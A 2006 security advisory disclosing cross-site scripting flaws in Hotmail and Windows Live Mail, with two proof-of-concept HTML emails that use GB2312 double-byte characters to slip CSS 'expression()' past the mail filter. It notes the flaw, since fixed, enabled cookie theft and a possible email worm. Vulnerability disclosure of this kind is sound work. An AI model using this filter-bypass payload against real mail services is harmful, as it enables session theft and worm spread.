Adivisory Name : Hotmail and Windows Live Mail XSS Vulnerabilities Release Date : 2006.11.03 Test On : Microsoft IE 6.0 Discover : Cheng Peng Su(applesoup_at_gmail.com) Introduction: Hotmail and Windows Live Mail are both web-based e-mail services by Microsoft. Details: Hotmail's filter identifies "expression()" syntax in a CSS attribute. According to Hasegawa Yosuke's post(http://archive.openmya.devnull.jp/2006.08/msg00369.html), in some character encodings(e.g. GB2312), we can substitute some special double-byte chars for the corresponding chars in "expression()". In this case, we can create a malformed CSS attribute, which Hotmail's filter fails to inspect and filter the "expression()" syntax. An example: Hotmail -------------------------------------------------- MIME-Version: 1.0 From: user<user@xxxxxxxx> Content-Type: text/html; charset=GB2312 Subject: example <img id='sss'> <input id='ttt' value="javascript:alert('xss')"> <span style="font-family:[ascii 163][asii 197]xpression[ascii 163][ascii 168]document.all.sss.src=document.all.ttt.value)">exploited</span> . -------------------------------------------------- Windows Live Mail -------------------------------------------------- MIME-Version: 1.0 From: user<user@xxxxxxxx> Content-Type: text/html; charset=GB2312 Subject: example <img id='sss'> <input id='ttt' value="javascript:alert('xss')"> <span style="font-family:[ascii 163][asii 197]xpression[ascii 163][ascii 168]document.all.EC_sss.src=document.all.EC_ttt.value)">exploited</span> . -------------------------------------------------- the injected code inside the CSS attribute is responsible for -Getting cookies. -Potential web-based e-mail worm. Vender status: Microsoft was notified on Sep 25th, 2006. The bug is now fixed. Original advisory: http://applesoup.googlepages.com/hotmail_xss.txt
